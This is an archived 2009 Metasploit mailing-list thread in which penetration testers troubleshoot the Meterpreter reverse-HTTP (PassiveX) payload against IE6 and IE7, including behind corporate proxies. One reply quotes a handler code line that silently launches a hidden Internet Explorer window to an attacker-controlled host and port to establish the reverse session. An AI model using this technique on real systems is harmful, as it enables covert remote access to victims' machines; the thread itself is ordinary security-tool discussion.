Metasploit mailing list archives
Is Meterpreter Reverse HTTP works with IE6 on WinXP sp3 and WinVista's IE7?
From: natron at invisibledenizen.org (natron)
Date: Mon, 2 Mar 2009 15:17:36 -0600
What exploit are you trying to run? What options in the payload are you using? Also, in this file: http://trac.metasploit.com/browser/framework3/trunk/lib/msf/core/handler/passivex.rb you'll see this line: 364 WshShell.Run("iexplore.exe -new http://#{datastore['PXHOST']}:#{datastore['PXPORT']}#{datastore['PXURI']}",0,false); Change that ",0,false" to ",1,false". This will make the 2nd IE window visible instead of hidden. When this one opens, respond back if there are any errors within IE. -n On Sat, Feb 28, 2009 at 4:15 PM, Taras P. Ivashchenko <naplanetu at gmail.com> wrote:
natron, in same circumstances listed below (XP and IE6, Vista and IE7) it looks not working :( If bind netcat on needed port and listen then we can see only one HTTP request received from target. On Mon, 2009-02-23 at 09:39 -0600, natron wrote:Let me know if you run into any bugs with it! Thanks, N 2009/2/23 Taras P. Ivashchenko <naplanetu at gmail.com>:Anthony, thanks a lot!) On Mon, 2009-02-23 at 02:47 +0500, Anthony Sapozhnikov wrote:?Taras, may be the following link helps you: http://blog.invisibledenizen.org/2009/02/updating-passivex-handler-to-work-with.html 2009/2/21 Taras P. Ivashchenko <naplanetu at gmail.com> ? ? ? ? ?Hello, list! ? ? ? ? Imho, reverse connect through HTTP proxy is one of most wanted ? ? ? ? features ? ? ? ? for client side attacks in penetration tests. Using of ? ? ? ? corporate proxy ? ? ? ? looks as standard for example in Russia. I tried to test it ? ? ? ? with WinXP ? ? ? ? sp2 and IE6 and proxy and it seems to not working :( ? ? ? ? Yesterday I also tested it on Windows Vista and IE7 without ? ? ? ? any proxy (I ? ? ? ? also switch off antivirus, windows defender and switch down ? ? ? ? IE's policy) ? ? ? ? but also it didn't work :( At same time reverse_tcp worked ? ? ? ? fine (when ? ? ? ? there is no proxy). ? ? ? ? -- ? ? ? ? ????? ???????? (Taras Ivashchenko), OSCP ? ? ? ? www.securityaudit.ru ? ? ? ? ---- ? ? ? ? "Software is like sex: it's better when it's free." - Linus ? ? ? ? Torvalds ? ? ? ? _______________________________________________ ? ? ? ? http://spool.metasploit.com/mailman/listinfo/framework -- mailto: Anton.Sapozhnikov at gmail.com _______________________________________________ http://spool.metasploit.com/mailman/listinfo/framework-- ????? ???????? (Taras Ivashchenko), OSCP www.securityaudit.ru ---- "Software is like sex: it's better when it's free." - Linus Torvalds _______________________________________________ http://spool.metasploit.com/mailman/listinfo/framework-- ????? ???????? (Taras Ivashchenko), OSCP www.securityaudit.ru ---- "Software is like sex: it's better when it's free." - Linus Torvalds
Current thread:
- Is Meterpreter Reverse HTTP works with IE6 on WinXP sp3 and WinVista's IE7? Taras P. Ivashchenko (Feb 21)
- Is Meterpreter Reverse HTTP works with IE6 on WinXP sp3 and WinVista's IE7? Anthony Sapozhnikov (Feb 22)
- Is Meterpreter Reverse HTTP works with IE6 on WinXP sp3 and WinVista's IE7? Taras P. Ivashchenko (Feb 23)
- Is Meterpreter Reverse HTTP works with IE6 on WinXP sp3 and WinVista's IE7? natron (Feb 23)
- Is Meterpreter Reverse HTTP works with IE6 on WinXP sp3 and WinVista's IE7? Taras P. Ivashchenko (Feb 28)
- Is Meterpreter Reverse HTTP works with IE6 on WinXP sp3 and WinVista's IE7? natron (Mar 02)
- Is Meterpreter Reverse HTTP works with IE6 on WinXP sp3 and WinVista's IE7? Taras P. Ivashchenko (Feb 23)
- Is Meterpreter Reverse HTTP works with IE6 on WinXP sp3 and WinVista's IE7? Anthony Sapozhnikov (Feb 22)